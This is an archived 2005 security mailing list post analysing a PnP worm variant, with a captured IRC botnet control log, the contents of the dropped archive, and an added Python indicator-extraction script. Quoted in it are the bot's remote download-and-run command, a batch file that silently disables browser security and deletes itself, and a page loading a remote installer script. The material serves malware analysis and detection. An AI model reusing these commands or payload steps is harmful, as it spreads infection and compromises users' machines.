lists.openwall.net: Open Source and information security mailing list archives
Message-ID: <BAY19-DAV16883579850C1D31F27F8D9B00@phx.gbl>
Date: Wed Aug 17 00:03:39 2005
From: se_cur_ity at hotmail.com (Morning Wood)
Subject: pnp worm unknown variant - post infection actions

pnp worm unknown variant - post infection actions
Donnie Werner
http://exploitlabs.com


[ relevant info ]

[08/16/2005] (out) NICK [00|USA|618452]
[08/16/2005] (out) USER 2K-7566 * 0 :INFECTEDUSER
[08/16/2005] (in)  :hub.de NOTICE [00|USA|618452] :*** If you are having problems connecting due to ping timeouts, please type /quote pong 5DCA1942 or /raw pong 5DCA1942 now.
[08/16/2005] (in)  PING :5DCA1942
[08/16/2005] (out) PONG 5DCA1942
[08/16/2005] (in)  :hub.de 001 [00|USA|618452] :Welcome to the hub IRC Network [00|USA|618452]!2K-7566@...xx.xx.49

[08/16/2005] (in)  :hub.de 004 [00|USA|618452] hub.de Unreal3.2.1 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeKVfMGCuzNT

[08/16/2005] (out) MODE [00|USA|618452]
[08/16/2005] (out) JOIN #upnp

[08/16/2005] (in)  :hub.de 332 [00|USA|618452] #upnp :.asc -S -s|.else status scan .asc PnP445 120 5 0 _a _r _e _s|.if nick *USA* .r JOIN #usa
[08/16/2005] (out) JOIN #usa
[08/16/2005] (out) PRIVMSG #upnp :IRC// Sent IRC raw: "JOIN #usa".

[08/16/2005] (in)  :[00|USA|618452]!2K-7566@...xx.xx.49 JOIN :#usa
[08/16/2005] (in)  :hub.de 332 [00|USA|618452] #usa :.down http://www.dreamcatcherprod.com/gc.exe C:\u487sdjkt.exe 1 -s|.r JOIN #rr
[08/16/2005] (out) JOIN #rr

[ gc.exe ]

gc.exe is a self-extracting archive that expands to:
02/08/2005  05:33 AM             3,496 kans.reg
01/31/2005  06:57 AM             3,276 kansup.reg
07/31/2005  11:06 PM               378 update.html
07/15/2005  05:36 AM                95 x.bat

The .bat runs:
----------
REGEDIT.EXE /S kans.reg
update.html
SLEEP 5
del kans.reg
del x.bat
----------

The .reg files disable IE security settings.

update.html contains (tags shown with square brackets):
----------
[TITLE]Security Update[/TITLE]
[HEAD][/HEAD]
[BODY]
[script language='JavaScript' type='text/JavaScript' src='http://install.xxxtoolbar.com/ist/scripts/prompt.php?retry=2&loadfirst=1&delayload=0&account_id=159900&recurrence=always&adid=a1117836900&event_type=onload&signature=159900'][/script]
[script language="JavaScript"]self.focus();[/script]
----------

which installs pornographic malware.
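The captured session above is the bot's control channel: the server pushes its orders through channel topics (IRC numeric 332), and the bot executes whatever the topic says. As an added example that is not part of the original post, the Python below parses such a log, splits each topic into bot commands and pulls out the indicators an analyst would want (C&C host, channels, download URL, drop path, scanner module, raw IRC pushed to the bot). It assumes only what the captured topics show about the command syntax (commands start with '.' and are separated by '|'; '.down <url> <path>', '.asc <module>', '.r <irc>'); the nick-shape check is an assumption from the one nick observed, and the sample log is constructed by re-joining the wrapped lines from the post, with the masked host octets kept masked.

```python
"""Pull indicators out of a captured IRC-bot control session.

Added example for this page, not code from the original post. Bot command
syntax is assumed only as far as the captured topics show it.
"""
import re
from dataclasses import dataclass, field
from typing import Iterator, Optional

# Constructed sample: the exchange from the post with its wrapped lines re-joined.
SAMPLE_LOG = """\
[08/16/2005] (out) NICK [00|USA|618452]
[08/16/2005] (out) USER 2K-7566 * 0 :INFECTEDUSER
[08/16/2005] (in)  PING :5DCA1942
[08/16/2005] (out) PONG 5DCA1942
[08/16/2005] (in)  :hub.de 001 [00|USA|618452] :Welcome to the hub IRC Network [00|USA|618452]!2K-7566@...xx.xx.49
[08/16/2005] (out) JOIN #upnp
[08/16/2005] (in)  :hub.de 332 [00|USA|618452] #upnp :.asc -S -s|.else status scan .asc PnP445 120 5 0 _a _r _e _s|.if nick *USA* .r JOIN #usa
[08/16/2005] (out) JOIN #usa
[08/16/2005] (in)  :hub.de 332 [00|USA|618452] #usa :.down http://www.dreamcatcherprod.com/gc.exe C:\\u487sdjkt.exe 1 -s|.r JOIN #rr
[08/16/2005] (out) JOIN #rr
"""

LOG_LINE_RE = re.compile(r"^\[(?P<date>[^\]]+)\]\s+\((?P<direction>in|out)\)\s+(?P<raw>.*)$")
# Nick shape seen in the capture, [<2 digits>|<country>|<digits>]; an assumption, not documented.
BOT_NICK_RE = re.compile(r"^\[\d{2}\|[A-Z]{2,3}\|\d+\]$")


@dataclass
class IrcMessage:
    direction: str            # "in" (server -> bot) or "out" (bot -> server)
    prefix: Optional[str]     # sender, e.g. "hub.de"
    command: str              # verb or numeric, e.g. "JOIN", "332"
    params: list[str]         # middle parameters
    trailing: Optional[str]   # text after " :" (topic, notice, realname)


@dataclass
class Indicators:
    server: Optional[str] = None
    nick: Optional[str] = None
    channels_joined: list[str] = field(default_factory=list)
    topic_commands: list[tuple[str, str]] = field(default_factory=list)
    download_urls: list[str] = field(default_factory=list)
    dropped_paths: list[str] = field(default_factory=list)
    scan_modules: list[str] = field(default_factory=list)
    raw_irc: list[str] = field(default_factory=list)


def parse_irc(raw: str) -> tuple[Optional[str], str, list[str], Optional[str]]:
    """Split one RFC 1459 line into prefix, command, params and trailing text."""
    prefix = None
    if raw.startswith(":"):
        prefix, _, raw = raw[1:].partition(" ")
    head, sep, trailing = raw.partition(" :")   # first " :" opens the trailing param
    params = head.split()
    command = params.pop(0) if params else ""
    return prefix, command, params, (trailing if sep else None)


def iter_messages(log_text: str) -> Iterator[IrcMessage]:
    for line in log_text.splitlines():
        m = LOG_LINE_RE.match(line)
        if not m:
            continue                              # not a log record; skip
        prefix, command, params, trailing = parse_irc(m.group("raw"))
        yield IrcMessage(m.group("direction"), prefix, command, params, trailing)


def split_bot_commands(topic: str) -> list[str]:
    """A topic carries several bot commands separated by '|'."""
    return [c.strip() for c in topic.split("|") if c.strip()]


def looks_like_bot_nick(nick: Optional[str]) -> bool:
    return bool(nick and BOT_NICK_RE.match(nick))


def extract_indicators(log_text: str) -> Indicators:
    ind = Indicators()
    for msg in iter_messages(log_text):
        if msg.direction == "out" and msg.command == "NICK" and msg.params:
            ind.nick = msg.params[0]
        elif msg.direction == "out" and msg.command == "JOIN" and msg.params:
            ind.channels_joined.append(msg.params[0])
        elif msg.command == "332" and len(msg.params) >= 2:   # RPL_TOPIC: <nick> <channel> :<topic>
            ind.server = ind.server or msg.prefix
            channel = msg.params[1]
            for cmd in split_bot_commands(msg.trailing or ""):
                ind.topic_commands.append((channel, cmd))
                tokens = cmd.split()
                if ".down" in tokens:                        # .down <url> <local path> ...
                    i = tokens.index(".down")
                    if i + 2 < len(tokens):
                        ind.download_urls.append(tokens[i + 1])
                        ind.dropped_paths.append(tokens[i + 2])
                if ".asc" in tokens:                         # .asc <module> ... ; ".asc -S -s" is flags only
                    i = tokens.index(".asc")
                    if i + 1 < len(tokens) and not tokens[i + 1].startswith("-"):
                        ind.scan_modules.append(tokens[i + 1])
                if ".r" in tokens:                           # .r <raw irc line>
                    i = tokens.index(".r")
                    ind.raw_irc.append(" ".join(tokens[i + 1:]))
    return ind


if __name__ == "__main__":
    r = extract_indicators(SAMPLE_LOG)
    print(f"nick {r.nick!r} (bot-shaped: {looks_like_bot_nick(r.nick)}) on {r.server}")
    print("channels:", r.channels_joined, "scanners:", r.scan_modules)
    print("downloads:", list(zip(r.download_urls, r.dropped_paths)), "raw IRC:", r.raw_irc)
```

Run against the sample it reports hub.de as the server, the #upnp / #usa / #rr chain of channels, PnP445 as the scanner module (the port 445 spreader the subject line refers to), the gc.exe URL with its C:\ drop path, and the two JOINs the topics relayed to the bot. The topic-as-command pattern is the detection hook: a 332 reply whose text is a '|'-separated list of dot-commands is not something a human channel produces.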